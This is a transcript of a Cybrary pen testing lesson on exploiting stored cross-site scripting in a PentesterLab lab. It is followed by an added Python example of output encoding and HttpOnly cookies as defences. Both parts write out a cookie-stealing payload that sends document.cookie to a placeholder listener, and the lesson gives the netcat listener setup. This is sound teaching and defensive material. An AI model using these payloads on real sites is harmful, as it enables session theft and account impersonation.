Welcome to Cybrary. I'm Raymond Evans. I will be your subject matter expert for Cybrary's web app pen testing course. In this video, we will be discussing exploiting cross-site scripting. What will be covered: we're going to talk about how to exploit cross-site scripting manually, using redirection and cookie theft, and then how to exploit cross-site scripting with BeEF. So how do we exploit cross-site scripting manually? The same technique that's used to identify cross-site scripting can also be used to exploit it,
except some additional steps need to be taken. First, we decide what kind of attack we want to perform.
Do you want to redirect the user to a malicious site, or lift some data from them?
Next, we're going to cover cross-site scripting redirection. But first you're going to need an additional VM: you're going to need the cross-site scripting VM from PentesterLab. So go to pentesterlab.com/exercises/xss_and_mysql_file.
That is the VM that we will be using for this one. So how do we exploit cross-site scripting manually to attempt redirection? Well, below is a line of code that could be used to cause an unwanted pop-up on a vulnerable website. So here in this code, we see it's calling img src example.com, onerror, and with that, on error, window.open with the URL that you put in there. That's going to be the URL it's trying to call, and it's going to have a height and width of 500 by 500. So let's go check that out.
Okay, so here we are in our environment.
We want to get somebody who's viewing this blog to get redirected, or at least have a pop-up come up. So what we're going to do is, I'm going to come in here and, uh, we're going to... let's do a title of "test" and we're going to leave it by anon.
So here in the text field, we're going to put our script in here, and... look at that, Iceweasel has prevented this site from opening a pop-up window.
See? And this is why it's good to have a pop-up blocker turned on. But for the purposes of this class, we're going to allow the pop-up right now so you can check it out.
And we're going to refresh the page here, because the attack is already on the page, stored on there. Right now, we're going to refresh.
Now, if this were connected to the Internet, it would have connected to google.com. However, it was not, so it did not connect. Now, the reason why this worked like it did was because it's trying to pull an image source from this website, but it gets an error trying to pull it from that website.
So then, on that error, it opens up a window and tries to go to google.com.
We showed you before that your cookie won't always show up in that other box; we showed that in the last video. And if you were to try to pull the cookie in the pop-up in this environment, it would do the same exact thing: you're not going to get that document.cookie populating the pop-up. However, you can set a listener to try to get that cookie right back to you.
So let's break this line down a bit here. So we have script, new Image, .src, the listener's IP and port. And when it calls out to it, it's going to send the document.cookie to that port. So the script: the script is enclosed in script tags, which include this content as a script: new Image, src.
It identifies a server to communicate with, saying, hey, we're going to pull a new image from this source, and then listener IP and port, /b.php?, document.cookie. This portion identifies the server the script will communicate with, and will send the cookies to that server.
So here's an example of how this is being used. In our vulnerable field, we will have script, new Image, .src, http, the IP address of the attacker, whatever port the attacker will be listening on, /b.php. How do we get data back from this attack? Well,
in order to do that, we're going to have to set up a listener. So we need a listener. So in your terminal type nc -lvp 80.
-l tells netcat to listen, -v tells netcat to be verbose, so it'll print out information received, and -p designates the port to use.
So let's go set that up real quick. Here we are in our environment. So you can see netcat's listening on port 80.
Next, we're going to put our script onto the vulnerable web page.
All right, so here we are on our vulnerable section of the page. We have script, new Image, .src, and we have our IP address here and port 80, and we have our netcat listener already set up. So let's submit the query and see what happens.
Well, we get a pop-up because it's stored from last time, so let's close out of that. I see PentesterLab's still working here, so let's come over here to our listener. Oh, look at that, we got some information back, so PentesterLab is connected to us.
See, you get the request, the host, we see the user agent, so we see what they're coming from, Accept, Accept, Accept... we see some statistics and information here.
Let it continue working here and see if it sends that nice cookie back. Try refreshing the page here... and there we go. Now we refreshed the page, and we got the cookie from the active user.
So now this cookie here can be used to imitate the individual on the website. So if that person was logged in at the time as the admin or as somebody else, this cookie here can be used to imitate them, which is very dangerous.
So if there's a website that has sensitive data on it, and it was vulnerable to cross-site scripting, an attack like this could be used to steal a cookie that could imitate an individual to get access into the website.
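As an added example that is not part of the Cybrary video or the PentesterLab exercise, the Python below shows the two server-side controls that defeat the attacks demonstrated above: HTML-encoding the comment before it is rendered, so the stored payload is displayed as text instead of executing, and setting the session cookie HttpOnly, so document.cookie returns nothing for the exfiltration script to send. The payload strings are constructed from the video's description; the cookie name PHPSESSID, the listener address and the b.php script name are placeholders; and cookie_is_script_readable() is a model of the browser's HttpOnly rule, not a real browser.

```python
"""Defensive counterpart to the stored-XSS demo: output encoding plus HttpOnly.
Added example; not code from the Cybrary course or PentesterLab."""
import html
import re
from http.cookies import SimpleCookie

# Constructed sample payloads of the kind typed into the blog's comment field
# in the video. LISTENER_IP and b.php are placeholders, not real endpoints.
REDIRECT_PAYLOAD = (
    '<img src="http://example.com" '
    'onerror="window.open(\'http://google.com\',\'\',\'height=500,width=500\')">'
)
COOKIE_THEFT_PAYLOAD = (
    '<script>new Image().src="http://LISTENER_IP:80/b.php?"+document.cookie</script>'
)

# Any '<' that starts a tag (opening or closing). After correct encoding the
# only '<' characters left in user content are the entity '&lt;', which a
# browser never parses as markup.
_TAG_START = re.compile(r"<\s*/?[a-z]", re.IGNORECASE)


def render_comment(user_text: str) -> str:
    """Return the HTML body text a page should emit for a user comment.

    html.escape() with quote=True turns < > & " ' into entities, so the two
    payloads above are shown to the reader verbatim and never executed."""
    return html.escape(user_text, quote=True)


def contains_markup(rendered_html: str) -> bool:
    """True if the string still contains something a browser would parse as a tag."""
    return _TAG_START.search(rendered_html) is not None


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie header value for the session cookie (name assumed).

    HttpOnly: the cookie still rides on every request, but document.cookie
    cannot read it, so the exfiltration script sends an empty query string.
    Secure and SameSite=Strict limit where the cookie travels at all."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["samesite"] = "Strict"
    jar["PHPSESSID"]["path"] = "/"
    return jar.output(header="").strip()


def cookie_is_script_readable(set_cookie_value: str) -> bool:
    """Model of the browser rule: document.cookie omits cookies flagged HttpOnly.

    This inspects the header text only; it is a check on our own configuration,
    not a browser."""
    attrs = [part.strip().lower() for part in set_cookie_value.split(";")]
    return "httponly" not in attrs


if __name__ == "__main__":
    for payload in (REDIRECT_PAYLOAD, COOKIE_THEFT_PAYLOAD):
        print("raw payload parses as markup :", contains_markup(payload))
        print("encoded output parses as markup:", contains_markup(render_comment(payload)))
        print("what the reader sees          :", render_comment(payload)[:60], "...")
    header = session_cookie_header("constructed-session-id")
    print(header)
    print("readable by document.cookie   :", cookie_is_script_readable(header))
```

Both controls are independent: encoding stops the payload from running at all, and HttpOnly limits the damage if some other injection point is missed. Neither replaces fixing the injection, but together they turn the cookie-theft line above into a request with nothing useful in it.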